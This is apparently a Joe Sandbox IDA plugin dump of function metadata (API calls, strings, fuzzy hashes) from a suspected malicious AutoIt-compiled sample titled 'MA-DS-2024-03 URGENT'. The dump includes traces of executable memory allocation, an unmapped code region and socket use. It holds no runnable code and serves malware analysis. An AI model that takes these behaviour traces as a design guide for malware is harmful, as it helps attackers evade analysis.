                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                        • String ID:
                                                        • API String ID: 2625713937-0
                                                        • Opcode ID: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                        • Instruction ID: 52848d70ea624aaff4fbf1a8dc35ad1b05fe5f58837c3e038025b123c59b5ab6
                                                        • Opcode Fuzzy Hash: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                        • Instruction Fuzzy Hash: E9F01930000A08EFDB516F26EC4CB5D3BA4A741326F188639E829981F1CB3459A9DF28
                                                        APIs
                                                          • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                          • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                          • Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB
                                                        • __swprintf.LIBCMT ref: 00412ECD
                                                        Strings
                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                        • API String ID: 1943609520-557222456
                                                        • Opcode ID: 47b1e74613fbc136e2545df492ee6b0930d33cf5f5d3911faf019498d72d6d6d
                                                        • Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
                                                        • Opcode Fuzzy Hash: 47b1e74613fbc136e2545df492ee6b0930d33cf5f5d3911faf019498d72d6d6d
                                                        • Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A
                                                        APIs
                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ContainedObject
                                                        • String ID: AutoIt3GUI$Container$%I
                                                        • API String ID: 3565006973-4251005282
                                                        • Opcode ID: 5ed104d2ff18c61b51a34f9361201fb114687c1fd7afa2c461df9e804e7132e4
                                                        • Instruction ID: 7009c248d49ee490af6c5c3a89f60ad5612698b65dddc7868321d046ba5149c9
                                                        • Opcode Fuzzy Hash: 5ed104d2ff18c61b51a34f9361201fb114687c1fd7afa2c461df9e804e7132e4
                                                        • Instruction Fuzzy Hash: E6915B70200605AFDB14DF64C884B6ABBE5FF49705F20856EED46CB392EB74E845CBA4
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 004250AD
                                                          • Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorHandling__87except__start
                                                        • String ID: pow
                                                        • API String ID: 2905807303-2276729525
                                                        • Opcode ID: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                        • Instruction ID: 06df28618b400316a62ebb5dd7aba5b0962afb7cd5aceff72fbc56c90cb9ae17
                                                        • Opcode Fuzzy Hash: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                                                        • Instruction Fuzzy Hash: 20518B20B0C50186DB217B24ED2137F2B909B44700F608AABE4D5863AADE3D8DD4DB8E
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: 3cA$_A
                                                        • API String ID: 4104443479-3480954128
                                                        • Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                        • Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
                                                        • Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                        • Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: SysMonthCal32
                                                        • API String ID: 2326795674-1439706946
                                                        • Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                        • Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
                                                        • Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                        • Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MoveWindow
                                                        • String ID: Listbox
                                                        • API String ID: 3315199576-2633736733
                                                        • Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                        • Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
                                                        • Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                        • Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __calloc_crt
                                                        • String ID: K$@BL
                                                        • API String ID: 3494438863-2209178351
                                                        • Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                        • Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
                                                        • Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                        • Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-3689287502
                                                        • Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                        • Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
                                                        • Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                        • Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-1355242751
                                                        • Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                        • Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
                                                        • Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                        • Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 2574300362-4033151799
                                                        • Opcode ID: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                        • Instruction ID: d6bbf1028a7b4fc64c7871010167997e003500dc78b62918f38a53d73d50c6ba
                                                        • Opcode Fuzzy Hash: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                        • Instruction Fuzzy Hash: ACD08231560322DFC320AF70C80838B72E4AF04342F208C3E9582C2250E6B8D8948B28
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                        • API String ID: 2574300362-199464113
                                                        • Opcode ID: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                        • Instruction ID: 12f83e0466186043ebac617d8a25d984f844cdccf99b41ce397239b1d45cf92f
                                                        • Opcode Fuzzy Hash: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                        • Instruction Fuzzy Hash: E6D0EC34510723DFD7209B35D81C64A76D4AF05751B51CC3E9485D6650E678D894C754
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                        • Instruction ID: 13cbbea2f029a5b6ef5998baa1d0dcecb81b6aaeffd6b1af622dda72ce090ed1
                                                        • Opcode Fuzzy Hash: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                        • Instruction Fuzzy Hash: B9C19C74A04216EFCB14CFA4D884AAEBBB5FF48311B1085A9EC05DB352D734ED85DB94
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?), ref: 0047E0BE
                                                        • CharLowerBuffW.USER32(?,?), ref: 0047E101
                                                          • Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
                                                        • _memmove.LIBCMT ref: 0047E314
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                        • String ID:
                                                        • API String ID: 3659485706-0
                                                        • Opcode ID: b3528aa481f7fcb0eb8522191f92e70b5ace6c5fa3869cfeab60d5d6ffa76828
                                                        • Instruction ID: 42d1ff19b42d4dd855f78dbf13e3d8c427035282adcdd002c13888698d5010eb
                                                        • Opcode Fuzzy Hash: b3528aa481f7fcb0eb8522191f92e70b5ace6c5fa3869cfeab60d5d6ffa76828
                                                        • Instruction Fuzzy Hash: 91C16A71604301DFC714DF29C48096ABBE4FF89318F148AAEF8999B352D734E946CB86
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 004780C3
                                                        • CoUninitialize.OLE32 ref: 004780CE
                                                          • Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                        • VariantInit.OLEAUT32(?), ref: 004780D9
                                                        • VariantClear.OLEAUT32(?), ref: 004783AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                        • String ID:
                                                        • API String ID: 780911581-0
                                                        • Opcode ID: e0598b6a95aabee3d6d7fa6bb81cfef96e97d1b35fca084c28bd1702e1ced289
                                                        • Instruction ID: 8f3373c4a7a5232ad993fe33ba140746eecbff111afdbebb2f840ccc5d4b94f2
                                                        • Opcode Fuzzy Hash: e0598b6a95aabee3d6d7fa6bb81cfef96e97d1b35fca084c28bd1702e1ced289
                                                        • Instruction Fuzzy Hash: 2CA17C756047019FCB10EF15C485B6AB7E4BF89758F04845EF999AB3A2CB38EC05CB4A
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Variant$AllocClearCopyInitString
                                                        • String ID:
                                                        • API String ID: 2808897238-0
                                                        • Opcode ID: 1a73f5e827cafa9a32e666fb2eece23f75d1219170068d3f03f0e50f057af89d
                                                        • Instruction ID: e8b204b61dde8909cc9ebe033208aa5324eaf332f6d31eb9d5c273134af525d6
                                                        • Opcode Fuzzy Hash: 1a73f5e827cafa9a32e666fb2eece23f75d1219170068d3f03f0e50f057af89d
                                                        • Instruction Fuzzy Hash: 9551C5747003019BDB20AF66D49162AB3E5AF45315F61C82FE986EB293DA38DC49870D
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004769E1
                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476A51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: ErrorLast$__itow__swprintfsocket
                                                        • String ID:
                                                        • API String ID: 2214342067-0
                                                        • Opcode ID: 1f37f2b7fbf17e66587eba69bd49cf375ba60b11beb26db7d7c2f153f99e3f74
                                                        • Instruction ID: c17afa0f8bd668a9c60690327d1e2da2a99666ddae487d2dea1163d2ceff8f1e
                                                        • Opcode Fuzzy Hash: 1f37f2b7fbf17e66587eba69bd49cf375ba60b11beb26db7d7c2f153f99e3f74
                                                        • Instruction Fuzzy Hash: A241C175740200AFEB50BF25CC86F6A37A49F05B18F04C56EFA59AB3C3DA789D008B59
                                                        APIs
                                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
                                                        • _strlen.LIBCMT ref: 004764D9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: _strlen
                                                        • String ID:
                                                        • API String ID: 4218353326-0
                                                        • Opcode ID: c4fdb5f2704758831fff94e23a426246860f5a4f667fed73e25f1c1d97e4656e
                                                        • Instruction ID: ea6fe9a4da80eb7d3c3fcd9d99711482a179dafd9654a2bb84a00921c454041b
                                                        • Opcode Fuzzy Hash: c4fdb5f2704758831fff94e23a426246860f5a4f667fed73e25f1c1d97e4656e
                                                        • Instruction Fuzzy Hash: F341B971600104ABCB14EB65EC85EEEB7AAAF44314F51C16FF919A72D3DB38AD04CB58
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 016B354C
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 016B35D5
                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 016B35E7
                                                        • __freea.LIBCMT ref: 016B35F0
                                                          • Part of subcall function 016B32FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 016B332C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                        • String ID:
                                                        • API String ID: 2652629310-0
                                                        • Opcode ID: 5058cfc357ae8b68e70c8ea84dc9b89a461a6f7d4cd82a9d306ee12c4f2d2b24
                                                        • Instruction ID: 97406350188dc3e12b89d4ec25cf0cbcfb5279de8f23cd0806f379560ee744a1
                                                        • Opcode Fuzzy Hash: 5058cfc357ae8b68e70c8ea84dc9b89a461a6f7d4cd82a9d306ee12c4f2d2b24
                                                        • Instruction Fuzzy Hash: D631CF72A0021AABEF259F68DCC4DEF7BA6EF40210F054168EC04DB350EB35C990CB90
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID:
                                                        • API String ID: 634782764-0
                                                        • Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                        • Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
                                                        • Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                        • Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F
                                                        APIs
                                                        • ClientToScreen.USER32(?,?), ref: 0048AB60
                                                        • GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                        • PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                        • MessageBeep.USER32(00000000), ref: 0048AC57
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                        • String ID:
                                                        • API String ID: 1352109105-0
                                                        • Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                        • Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
                                                        • Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                        • Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A
                                                        APIs
